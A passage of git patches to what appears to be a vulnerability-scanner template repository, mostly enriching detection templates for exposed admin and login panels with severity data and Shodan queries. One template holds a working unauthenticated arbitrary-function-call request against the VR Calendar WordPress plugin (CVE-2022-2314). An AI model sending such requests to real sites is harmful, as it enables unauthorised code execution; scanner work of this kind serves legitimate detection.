"{{BaseURL}}/{{Hostname}}/errors.log" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 77b714964f776e7597929b37eb7be3e26966c06f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:40:41 +0000 Subject: [PATCH 0289/1133] Auto Generated CVE annotations [Thu Dec 8 09:40:41 UTC 2022] :robot: --- cves/2019/CVE-2019-6802.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-6802.yaml b/cves/2019/CVE-2019-6802.yaml index af9a49d03d..17c25558ee 100644 --- a/cves/2019/CVE-2019-6802.yaml +++ b/cves/2019/CVE-2019-6802.yaml @@ -9,11 +9,15 @@ info: reference: - https://vuldb.com/?id.130257 - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 + - https://github.com/pypiserver/pypiserver/issues/237 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2019-6802 + cwe-id: CWE-79,CWE-74 metadata: - verified: true shodan-query: html:"pypiserver" + verified: "true" tags: cve,cve2019,crlf,generic,pypiserver requests: From 1ffdff5b2d9c64ce7faef96b9305a6fad89024a4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 16:56:04 +0530 Subject: [PATCH 0290/1133] Update gradle-libs.yaml --- exposures/files/gradle-libs.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/files/gradle-libs.yaml b/exposures/files/gradle-libs.yaml index 5cd6243e8f..c1b0a846a7 100644 --- a/exposures/files/gradle-libs.yaml +++ b/exposures/files/gradle-libs.yaml @@ -1,9 +1,9 @@ id: gradle-libs info: - name: Gradle libs.versions.toml Disclosure + name: Gradle Library Version Disclosure author: DhiyaneshDK - severity: low + severity: info metadata: verified: true github-query: filename:libs.versions.toml From 1ecf1ad13a08cef90847b011b05516864a72d9fb Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 8 Dec 2022 08:42:03 -0500 Subject: [PATCH 0291/1133] Dashboard Content Enhancements (#6289) Dashboard Content Enhancements --- exposed-panels/asus-router-panel.yaml | 9 ++++++++- exposed-panels/backpack/backpack-admin-panel.yaml | 10 ++++++++-- exposed-panels/cisco/cisco-webvpn-detect.yaml | 9 ++++++++- exposed-panels/cudatel-panel.yaml | 9 ++++++++- exposed-panels/dradis-pro-panel.yaml | 9 ++++++++- exposed-panels/influxdb-panel.yaml | 10 ++++++++-- exposed-panels/mikrotik/mikrotik-routeros-old.yaml | 9 ++++++++- exposed-panels/oracle-people-sign-in.yaml | 11 +++++++++-- exposed-panels/orchid-vms-panel.yaml | 9 ++++++++- exposed-panels/osticket-panel.yaml | 9 ++++++++- exposed-panels/osticket/osticket-install.yaml | 9 ++++++++- exposed-panels/otobo-panel.yaml | 10 ++++++++-- exposed-panels/ourmgmt3-panel.yaml | 9 ++++++++- exposed-panels/pacs-connexion-utilisateur.yaml | 9 ++++++++- exposed-panels/panabit-panel.yaml | 9 ++++++++- exposed-panels/pandora-fms-console.yaml | 9 ++++++++- exposed-panels/parallels-html-client.yaml | 9 ++++++++- .../parallels/parallels-hsphere-detect.yaml | 9 ++++++++- exposed-panels/parse-dashboard.yaml | 9 ++++++++- .../payroll-management-system-panel.yaml | 9 ++++++++- exposed-panels/pega-web-panel.yaml | 10 ++++++++-- exposed-panels/pentaho-panel.yaml | 9 ++++++++- exposed-panels/persis-panel.yaml | 9 ++++++++- exposed-panels/pfsense-login.yaml | 10 ++++++++-- exposed-panels/pgadmin-exposure.yaml | 9 ++++++++- exposed-panels/phabricator-login.yaml | 9 ++++++++- exposed-panels/phoronix-pane.yaml | 9 ++++++++- exposed-panels/php-mailer.yaml | 9 ++++++++- exposed-panels/phpcollab-panel.yaml | 9 ++++++++- exposed-panels/phpldap-admin.yaml | 9 ++++++++- exposed-panels/phpminiadmin-panel.yaml | 10 ++++++++-- exposed-panels/phpmyadmin-panel.yaml | 9 ++++++++- exposed-panels/phppgadmin-panel.yaml | 10 ++++++++-- exposed-panels/pichome-panel.yaml | 9 ++++++++- exposed-panels/piwigo-panel.yaml | 9 ++++++++- exposed-panels/plastic-scm-login.yaml | 9 ++++++++- exposed-panels/plesk-obsidian-login.yaml | 9 ++++++++- exposed-panels/plesk-onyx-login.yaml | 9 ++++++++- exposed-panels/polycom-admin-detect.yaml | 9 ++++++++- exposed-panels/polycom-login.yaml | 9 ++++++++- exposed-panels/powerjob-panel.yaml | 9 ++++++++- exposed-panels/powerlogic-ion.yaml | 9 ++++++++- exposed-panels/privx-panel.yaml | 10 ++++++++-- exposed-panels/project-insight-login.yaml | 9 ++++++++- exposed-panels/projectsend-login.yaml | 9 ++++++++- exposed-panels/prometheus-exposed-panel.yaml | 11 +++++++++-- .../prometheus-pushgateway-exposed-panel.yaml | 10 ++++++++-- exposed-panels/pulse-secure-panel.yaml | 11 +++++++++-- exposed-panels/puppetboard-panel.yaml | 9 ++++++++- exposed-panels/pure-storage-login.yaml | 9 ++++++++- exposed-panels/pypicloud-panel.yaml | 11 +++++++++-- exposed-panels/qlik-sense-server.yaml | 10 ++++++++-- exposed-panels/qmail-admin-login.yaml | 9 ++++++++- exposed-panels/qnap/qnap-photostation-panel.yaml | 10 ++++++++-- exposed-panels/qnap/qnap-qts-panel.yaml | 10 ++++++++-- exposed-panels/qualcomm-voip-router.yaml | 11 +++++++++-- exposed-panels/qualtrics-login.yaml | 9 ++++++++- exposed-panels/quantum-scalar-detect.yaml | 9 ++++++++- exposed-panels/r-webserver-login.yaml | 12 ++++++++++-- exposed-panels/rabbitmq-dashboard.yaml | 9 ++++++++- exposed-panels/racksnet-login.yaml | 11 ++++++++--- exposed-panels/radius-manager.yaml | 9 ++++++++- exposed-panels/rancher-panel.yaml | 14 ++++++++++---- exposed-panels/raspberrymatic-panel.yaml | 9 ++++++++- exposed-panels/redash-panel.yaml | 9 ++++++++- exposed-panels/redis-commander-exposure.yaml | 9 ++++++++- exposed-panels/remkon-manager-panel.yaml | 9 ++++++++- exposed-panels/remote-ui-login.yaml | 9 ++++++++- exposed-panels/residential-gateway-login.yaml | 9 ++++++++- 69 files changed, 561 insertions(+), 92 deletions(-) diff --git a/exposed-panels/asus-router-panel.yaml b/exposed-panels/asus-router-panel.yaml index f4484d15dd..cb715acc21 100644 --- a/exposed-panels/asus-router-panel.yaml +++ b/exposed-panels/asus-router-panel.yaml @@ -1,9 +1,14 @@ id: asus-router-panel info: - name: Asus Router Login Panel + name: Asus Router Login Panel - Detect author: arafatansari severity: info + description: Asus router login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: 'Server: httpd/2.0 port:8080' @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/backpack/backpack-admin-panel.yaml b/exposed-panels/backpack/backpack-admin-panel.yaml index 13466bc0e1..d9ed1f6cf5 100644 --- a/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/exposed-panels/backpack/backpack-admin-panel.yaml @@ -1,11 +1,15 @@ id: backpack-admin-panel info: - name: Backpack Admin Login Panel + name: Laravel Backpack Admin Login Panel - Detect author: shine severity: info description: | - An Backpack Admin dashboard was detected. + Laravel Backpack admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Backpack Admin" @@ -23,3 +27,5 @@ requests: - 'Backpack Admin' - 'backpack_alerts' condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml index bf99b9b8b5..e73c9a7305 100644 --- a/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -1,11 +1,16 @@ id: cisco-webvpn-detect info: - name: Cisco WebVPN Detect + name: Cisco WebVPN Panel - Detect author: ricardomaia severity: info + description: Cisco WebVPN panel was detected. reference: - https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" @@ -38,3 +43,5 @@ requests: - "webvpncontext=00@.+" - "webvpn=" condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/cudatel-panel.yaml b/exposed-panels/cudatel-panel.yaml index ebc753eefb..588c36bea8 100644 --- a/exposed-panels/cudatel-panel.yaml +++ b/exposed-panels/cudatel-panel.yaml @@ -1,9 +1,14 @@ id: cudatel-panel info: - name: CudaTel Login Panel + name: CudaTel Login Panel - Detect author: arafatansari severity: info + description: CudaTel login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"CudaTel" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml index 95f1daf795..08bbd51b14 100644 --- a/exposed-panels/dradis-pro-panel.yaml +++ b/exposed-panels/dradis-pro-panel.yaml @@ -1,11 +1,16 @@ id: dradis-pro-panel info: - name: Dradis Professional Edition Panel + name: Dradis Professional Edition Login Panel - Detect author: righettod severity: info + description: Dradis Professional Edition login panel was detected. reference: - https://dradisframework.com/ce/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Dradis Professional Edition" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/influxdb-panel.yaml b/exposed-panels/influxdb-panel.yaml index 0cde76ae6f..c99c861151 100644 --- a/exposed-panels/influxdb-panel.yaml +++ b/exposed-panels/influxdb-panel.yaml @@ -1,12 +1,16 @@ id: influxdb-panel info: - name: InfluxDB Detect + name: InfluxDB Admin Interface Panel - Detect author: pikpikcu,idealphase severity: info - description: Open Source Time Series Database, high-speed read and write database. + description: InfluxDB admin interface panel was detected. reference: - https://www.influxdata.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"InfluxDB - Admin Interface" tags: panel,influxdb @@ -32,3 +36,5 @@ requests: group: 1 regex: - 'InfluxDB<\/b> v([\d.]+)<\/p>' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index 2915a28385..33c470794a 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -1,9 +1,14 @@ id: mikrotik-routeros-old info: - name: MikroTik RouterOS Administration Login + name: MikroTik RouterOS Admin Login Panel - Detect author: its0x08,DhiyaneshDk severity: info + description: MikroTik RouterOS admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"mikrotik routeros > administration" @@ -27,3 +32,5 @@ requests: group: 1 regex: - '
mikrotik routeros (.[0-9.]+) configuration page
' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml index 78ad5e5469..e631703255 100644 --- a/exposed-panels/oracle-people-sign-in.yaml +++ b/exposed-panels/oracle-people-sign-in.yaml @@ -1,9 +1,14 @@ id: oracle-people-sign-in info: - name: Oracle Peoplesoft Sign-in + name: Oracle PeopleSoft Login Panel - Detect author: idealphase severity: info + description: Oracle PeopleSoft login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Oracle PeopleSoft Sign-in" tags: oracle,panel @@ -26,4 +31,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/orchid-vms-panel.yaml b/exposed-panels/orchid-vms-panel.yaml index 25c54194cb..4e416160b1 100644 --- a/exposed-panels/orchid-vms-panel.yaml +++ b/exposed-panels/orchid-vms-panel.yaml @@ -1,9 +1,14 @@ id: orchid-vms-panel info: - name: Orchid Core VMS Panel Detect + name: Orchid Core VMS Panel - Detect author: princechaddha severity: info + description: Orchid Core VMS panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Orchid Core VMS" tags: panel,orchid @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/osticket-panel.yaml b/exposed-panels/osticket-panel.yaml index c70781f945..e5e3576a08 100644 --- a/exposed-panels/osticket-panel.yaml +++ b/exposed-panels/osticket-panel.yaml @@ -1,9 +1,14 @@ id: osticket-panel info: - name: OSTicket Panel Detect + name: osTicket Login Panel - Detect author: ritikchaddha severity: info + description: osTicket login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"powered by osTicket" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/osticket/osticket-install.yaml b/exposed-panels/osticket/osticket-install.yaml index d7c02ed402..599affb6d8 100644 --- a/exposed-panels/osticket/osticket-install.yaml +++ b/exposed-panels/osticket/osticket-install.yaml @@ -1,9 +1,14 @@ id: osticket-install info: - name: OSTicket Installation + name: osTicket Installer Panel - Detect author: ritikchaddha severity: high + description: osTicket installer panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"osTicket Installer" @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/otobo-panel.yaml b/exposed-panels/otobo-panel.yaml index bc3f8054fc..bc2b7fcd8e 100644 --- a/exposed-panels/otobo-panel.yaml +++ b/exposed-panels/otobo-panel.yaml @@ -1,12 +1,16 @@ id: otobo-panel info: - name: OTOBO Login Panel + name: OTOBO Login Panel - Detect author: princechaddha severity: info - description: OTOBO is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. + description: OTOBO login panel was detected. reference: - https://github.com/rotheross/otobo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"otobo" tags: panel,otobo @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml index 18a5db8b3a..52d74b483c 100644 --- a/exposed-panels/ourmgmt3-panel.yaml +++ b/exposed-panels/ourmgmt3-panel.yaml @@ -1,9 +1,14 @@ id: ourmgmt3-panel info: - name: OurMGMT3 Admin Panel + name: OurMGMT3 Admin Login Panel - Detect author: ritikchaddha severity: info + description: OurMGMT3 admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"OurMGMT3" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pacs-connexion-utilisateur.yaml b/exposed-panels/pacs-connexion-utilisateur.yaml index 4f7558b184..d61eb0a75a 100644 --- a/exposed-panels/pacs-connexion-utilisateur.yaml +++ b/exposed-panels/pacs-connexion-utilisateur.yaml @@ -1,9 +1,14 @@ id: gxd5-pacs-connexion-utilisateur info: - name: GXD5 Pacs Connexion utilisateur + name: GXD5 Pacs Connexion Login Panel - Detect author: dhiyaneshDK severity: info + description: GXD5 Pacs Connexion panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"GXD5 Pacs Connexion utilisateur" tags: panel,login @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/panabit-panel.yaml b/exposed-panels/panabit-panel.yaml index 09efda928f..e246764ea8 100644 --- a/exposed-panels/panabit-panel.yaml +++ b/exposed-panels/panabit-panel.yaml @@ -1,9 +1,14 @@ id: panabit-panel info: - name: Panabit Panel Detect + name: Panabit Login Panel - Detect author: ffffffff0x severity: info + description: Panabit login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 reference: - https://www.panabit.com/ metadata: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pandora-fms-console.yaml b/exposed-panels/pandora-fms-console.yaml index 6beb1676e6..09e4209205 100644 --- a/exposed-panels/pandora-fms-console.yaml +++ b/exposed-panels/pandora-fms-console.yaml @@ -1,11 +1,16 @@ id: pandora-fms-console info: - name: Pandora FMS + name: Pandora FMS Mobile Console Login Panel - Detect author: dhiyaneshDk severity: info + description: Pandora FMS Mobile Console login panel was detected. reference: - https://www.exploit-db.com/ghdb/6827 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,edb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml index d55db4e436..cd4141ff08 100644 --- a/exposed-panels/parallels-html-client.yaml +++ b/exposed-panels/parallels-html-client.yaml @@ -1,9 +1,14 @@ id: parallels-html-client info: - name: Parallels HTML5 Client + name: Parallels HTML5 Client Login Panel - Detect author: pdteam severity: info + description: Parallels HTML5 Client login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -15,3 +20,5 @@ requests: words: - "Parallels HTML5 Client" part: body + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parallels/parallels-hsphere-detect.yaml b/exposed-panels/parallels/parallels-hsphere-detect.yaml index ac31366b02..7fa8bfe497 100644 --- a/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -1,9 +1,14 @@ id: parallels-hsphere-detect info: - name: Parallels H-Sphere Detect + name: Parallels H-Sphere Login Panel - Detect author: ritikchaddha severity: info + description: Parallels H-Sphere login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Parallels H-Sphere" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parse-dashboard.yaml b/exposed-panels/parse-dashboard.yaml index a73c49e2cd..769a66f69b 100644 --- a/exposed-panels/parse-dashboard.yaml +++ b/exposed-panels/parse-dashboard.yaml @@ -1,9 +1,14 @@ id: parse-dashboard info: - name: Parse Dashboard Exposure + name: Parse Dashboard Login Panel - Detect author: tess severity: info + description: Parse Dashboard login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Parse Dashboard" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/payroll-management-system-panel.yaml b/exposed-panels/payroll-management-system-panel.yaml index 362a091e74..ede6a15e98 100644 --- a/exposed-panels/payroll-management-system-panel.yaml +++ b/exposed-panels/payroll-management-system-panel.yaml @@ -1,9 +1,14 @@ id: payroll-management-system-panel info: - name: Payroll Management System Web Login Panel + name: Payroll Management System Web Login Panel - Detect author: idealphase severity: info + description: Payroll Management System Web login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Admin | Employee's Payroll Management System" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index d6458abe6c..b673b32d37 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -1,13 +1,17 @@ id: pega-web-panel info: - name: Pega Infinity Web Login Panel + name: Pega Infinity Login Panel - Detect author: powerexploit,righettod severity: info description: | - Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation + Pega Infinity login panel was detected. reference: - https://www.pega.com/infinity + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Pega Platform" @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pentaho-panel.yaml b/exposed-panels/pentaho-panel.yaml index 8dd42cf76a..e823cc843a 100644 --- a/exposed-panels/pentaho-panel.yaml +++ b/exposed-panels/pentaho-panel.yaml @@ -1,9 +1,14 @@ id: pentaho-panel info: - name: Pentaho Panel + name: Pentaho User Console Login Panel - Detect author: princechaddha,dhiyaneshDK severity: info + description: Pentaho User Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: pentaho tags: panel,pentaho @@ -17,3 +22,5 @@ requests: - type: word words: - 'Pentaho User Console - Login' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml index f9112c83cf..2fc2941311 100644 --- a/exposed-panels/persis-panel.yaml +++ b/exposed-panels/persis-panel.yaml @@ -1,11 +1,16 @@ id: persis-panel info: - name: Persis Panel + name: Persis Panel - Detect author: righettod severity: info + description: Persis panel was detected, reference: - https://www.persis.de/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Persis" @@ -38,3 +43,5 @@ requests: - 301 - 302 condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pfsense-login.yaml b/exposed-panels/pfsense-login.yaml index 115b15340f..e118e86385 100644 --- a/exposed-panels/pfsense-login.yaml +++ b/exposed-panels/pfsense-login.yaml @@ -1,13 +1,17 @@ id: pfsense-login info: - name: pfSense Login + name: pfSense Login Panel - Detect author: idealphase severity: info - description: free network firewall distribution, based on the FreeBSD operating system with a custom kernel and including third party free software packages for additional functionality. + description: pfSense login panel was detected. reference: - https://www.pfsense.org/download/ - https://www.pfsense.org/getting-started/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"pfSense - Login" google-query: intitle:"pfSense - Login" @@ -34,3 +38,5 @@ requests: group: 1 regex: - ' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + condition: and From 98e5d6f06f7fba0700d0d0c253354b6ee0d4b3a9 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:55:08 +0530 Subject: [PATCH 0387/1133] Create CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 49 ++++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 cves/2022/CVE-2022-2314.yaml diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml new file mode 100644 index 0000000000..f96dd66a19 --- /dev/null +++ b/cves/2022/CVE-2022-2314.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-2314 + +info: + name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call + author: theamanrawat + severity: critical + description: | + The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site. + reference: + - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82 + - https://wordpress.org/plugins/vr-calendar-sync/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2314 + cwe-id: CWE-78 + metadata: + verified: "true" + tags: cve,cve2021,rce,wpscan,wordpress,wp-plugin,vr-calendar-sync,unauth + +requests: + - raw: + - | + GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "phpinfo" + - "PHP Version" + condition: and + + - type: word + part: body_1 + words: + - "vrc-calendar" + + - type: status + status: + - 200 From 33698baf767a6e613ddd604f29fd789d15bd10df Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:56:13 +0530 Subject: [PATCH 0388/1133] Update icecast-server-detect.yaml --- technologies/icecast-server-detect.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/technologies/icecast-server-detect.yaml b/technologies/icecast-server-detect.yaml index addce85646..6f91d06cae 100644 --- a/technologies/icecast-server-detect.yaml +++ b/technologies/icecast-server-detect.yaml @@ -16,11 +16,6 @@ requests: matchers-condition: and matchers: - - type: word - part: body - words: - - 'Icecast Streaming Media Server' - - type: word part: header words: From 2fd1decf998e80362aec2ada0f6c483b74c153b3 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:56:22 +0530 Subject: [PATCH 0389/1133] Create easyscripts-installer.yaml --- .../installer/easyscripts-installer.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/easyscripts-installer.yaml diff --git a/misconfiguration/installer/easyscripts-installer.yaml b/misconfiguration/installer/easyscripts-installer.yaml new file mode 100644 index 0000000000..3f98b6b4f4 --- /dev/null +++ b/misconfiguration/installer/easyscripts-installer.yaml @@ -0,0 +1,28 @@ +id: easyscripts-installer + +info: + name: Easyscripts Installer + author: theamanrawat + severity: high + metadata: + verified: true + shodan-query: http.title:"Installer - Easyscripts" + tags: easyscripts, installer + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Installer - Easyscripts' + - '/application/information/application/' + condition: and + + - type: status + status: + - 200 From b84d059fbdaacffb3ffb796b26840cf60509ffdd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:58:08 +0530 Subject: [PATCH 0390/1133] Update easyscripts-installer.yaml --- misconfiguration/installer/easyscripts-installer.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/misconfiguration/installer/easyscripts-installer.yaml b/misconfiguration/installer/easyscripts-installer.yaml index 3f98b6b4f4..5f0a97b15c 100644 --- a/misconfiguration/installer/easyscripts-installer.yaml +++ b/misconfiguration/installer/easyscripts-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Installer - Easyscripts" - tags: easyscripts, installer + tags: misconfig,easyscripts,installer requests: - method: GET @@ -20,8 +20,6 @@ requests: part: body words: - 'Installer - Easyscripts' - - '/application/information/application/' - condition: and - type: status status: From 9225697d40d7649cfb0a786a96a7874f5cc12e65 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:01:49 +0530 Subject: [PATCH 0391/1133] Update 